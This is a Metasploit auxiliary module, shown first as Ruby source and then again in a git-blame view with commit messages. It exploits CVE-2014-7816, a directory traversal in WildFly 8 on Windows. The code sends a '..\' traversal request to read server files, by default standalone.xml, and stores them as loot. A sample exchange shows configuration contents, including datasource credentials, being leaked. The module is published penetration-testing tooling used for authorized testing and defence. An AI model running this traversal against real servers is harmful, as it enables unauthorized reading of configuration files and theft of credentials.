metasploit-framework/modules/auxiliary/scanner/http/wildfly_traversal.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WildFly 8 Directory Traversal',
      'Description'    => %q{
        This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final
        web server running on port 8080, named JBoss Undertow. The vulnerability only affects to
        Windows systems.
      },
      'References'     =>
        [
          ['CVE', '2014-7816' ],
          ['URL', 'https://access.redhat.com/security/cve/CVE-2014-7816'],
          ['URL', 'https://www.conviso.com.br/advisories/CONVISO-14-001.txt'],
          ['URL', 'http://www.openwall.com/lists/oss-security/2014/11/27/4']
        ],
      'Author'         => 'Roberto Soares Espreto <robertoespreto[at]gmail.com>',
      'License'        => MSF_LICENSE,
      'DisclosureDate' => 'Oct 22 2014'
    ))

    register_options(
      [
        Opt::RPORT(8080),
        OptString.new('RELATIVE_FILE_PATH', [true, 'Relative path to the file to read', 'standalone\\configuration\\standalone.xml']),
        OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 1])
      ], self.class)
  end

  def run_host(ip)
    vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}")

    traversal = "..\\" * datastore['TRAVERSAL_DEPTH']
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/#{traversal}\\#{datastore['RELATIVE_FILE_PATH']}"
    })

    if res &&
        res.code == 200 &&
        res.headers['Server'] &&
        res.headers['Server'] =~ /WildFly/
      vprint_line(res.to_s)
      fname = File.basename(datastore['RELATIVE_FILE_PATH'])

      path = store_loot(
        'wildfly.http',
        'application/octet-stream',
        ip,
        res.body,
        fname
      )
      print_good("#{peer} - File saved in: #{path}")
    else
      vprint_error("#{peer} - Nothing was downloaded")
    end
  end
end

=begin
GET /..\\standalone\\configuration\\standalone.xml HTTP/1.1
User-Agent: curl/7.38.0
Host: 127.0.0.1:8080
Accept: */*

HTTP/1.1 200 OK
Connection: keep-alive
Last-Modified: Wed, 22 Oct 2014 14:37:28 GMT
X-Powered-By: Undertow/1
Server: WildFly/8
Content-Type: text/xml
Content-Length: 19697
Date: Wed, 22 Oct 2014 16:32:08 GMT

<?xml version='1.0' encoding='UTF-8'?>

<server xmlns="urn:jboss:domain:2.1">
<extensions>
<extension module="org.jboss.as.clustering.infinispan"/>
...snip...
<subsystem xmlns="urn:jboss:domain:datasources:2.0">
<datasources>
<datasource jndi-name="java:jboss/datasources/ExampleDS" pool-name="ExampleDS" enabled="true" use-java-context="true">
<connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE</connection-url>
<driver>h2</driver>
<security>
<user-name>sa</user-name>
<password>sa</password>
</security>
</datasource>
<drivers>
<driver name="h2" module="com.h2database.h2">
<xa-datasource-class>org.h2.jdbcx.JdbcDataSource</xa-datasource-class>
...snip...
=end
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`##`
			`# This module requires Metasploit: http://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`

			`class Metasploit3 < Msf::Auxiliary`

			`include Msf::Auxiliary::Report`
			`include Msf::Exploit::Remote::HttpClient`
Change mixin include order 2014-12-01 16:22:20 +00:00			`include Msf::Auxiliary::Scanner`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00
			`def initialize(info = {})`
			`super(update_info(info,`
Fix description 2014-12-01 16:19:14 +00:00			`'Name' => 'WildFly 8 Directory Traversal',`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`'Description' => %q{`
Fix description 2014-12-01 16:19:14 +00:00			`This module exploits a directory traversal vulnerability found in the WildFly 8.1.0.Final`
			`web server running on port 8080, named JBoss Undertow. The vulnerability only affects to`
			`Windows systems.`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`},`
			`'References' =>`
			`[`
Use single quote and minor cosmetic changes 2014-12-01 15:57:29 +00:00			`['CVE', '2014-7816' ],`
			`['URL', 'https://access.redhat.com/security/cve/CVE-2014-7816'],`
			`['URL', 'https://www.conviso.com.br/advisories/CONVISO-14-001.txt'],`
			`['URL', 'http://www.openwall.com/lists/oss-security/2014/11/27/4']`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`],`
			`'Author' => 'Roberto Soares Espreto <robertoespreto[at]gmail.com>',`
			`'License' => MSF_LICENSE,`
			`'DisclosureDate' => 'Oct 22 2014'`
			`))`

			`register_options(`
			`[`
			`Opt::RPORT(8080),`
Use single quote and minor cosmetic changes 2014-12-01 15:57:29 +00:00			`OptString.new('RELATIVE_FILE_PATH', [true, 'Relative path to the file to read', 'standalone\\configuration\\standalone.xml']),`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`OptInt.new('TRAVERSAL_DEPTH', [true, 'Traversal depth', 1])`
			`], self.class)`
			`end`

			`def run_host(ip)`
Use vprint by default 2014-12-01 16:20:12 +00:00			`vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}")`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00
			`traversal = "..\\" * datastore['TRAVERSAL_DEPTH']`
			`res = send_request_raw({`
			`'method' => 'GET',`
Use single quote and minor cosmetic changes 2014-12-01 15:57:29 +00:00			`'uri' => "/#{traversal}\\#{datastore['RELATIVE_FILE_PATH']}"`
Do minor cleanup * Prepend peer * Use print_good when file downloaded 2014-12-01 15:53:00 +00:00			`})`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00
Fix description 2014-12-01 16:19:14 +00:00			`if res &&`
			`res.code == 200 &&`
			`res.headers['Server'] &&`
			`res.headers['Server'] =~ /WildFly/`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`vprint_line(res.to_s)`
Use single quote and minor cosmetic changes 2014-12-01 15:57:29 +00:00			`fname = File.basename(datastore['RELATIVE_FILE_PATH'])`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00
			`path = store_loot(`
			`'wildfly.http',`
			`'application/octet-stream',`
			`ip,`
			`res.body,`
			`fname`
			`)`
Do minor cleanup * Prepend peer * Use print_good when file downloaded 2014-12-01 15:53:00 +00:00			`print_good("#{peer} - File saved in: #{path}")`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`else`
Use vprint by default 2014-12-01 16:20:12 +00:00			`vprint_error("#{peer} - Nothing was downloaded")`
Add CVE-2014-7816 Directory Traversal for WildFly 8 Application 2014-11-27 02:13:29 +00:00			`end`
			`end`
			`end`

			`=begin`
			`GET /..\\standalone\\configuration\\standalone.xml HTTP/1.1`
			`User-Agent: curl/7.38.0`
			`Host: 127.0.0.1:8080`
			`Accept: /`

			`HTTP/1.1 200 OK`
			`Connection: keep-alive`
			`Last-Modified: Wed, 22 Oct 2014 14:37:28 GMT`
			`X-Powered-By: Undertow/1`
			`Server: WildFly/8`
			`Content-Type: text/xml`
			`Content-Length: 19697`
			`Date: Wed, 22 Oct 2014 16:32:08 GMT`

			`<?xml version='1.0' encoding='UTF-8'?>`

			`<server xmlns="urn:jboss:domain:2.1">`
			`<extensions>`
			`<extension module="org.jboss.as.clustering.infinispan"/>`
			`...snip...`
			`<subsystem xmlns="urn:jboss:domain:datasources:2.0">`
			`<datasources>`
			`<datasource jndi-name="java:jboss/datasources/ExampleDS" pool-name="ExampleDS" enabled="true" use-java-context="true">`
			`<connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1;DB_CLOSE_ON_EXIT=FALSE</connection-url>`
			`<driver>h2</driver>`
			`<security>`
			`<user-name>sa</user-name>`
			`<password>sa</password>`
			`</security>`
			`</datasource>`
			`<drivers>`
			`<driver name="h2" module="com.h2database.h2">`
			`<xa-datasource-class>org.h2.jdbcx.JdbcDataSource</xa-datasource-class>`
			`...snip...`
			`=end`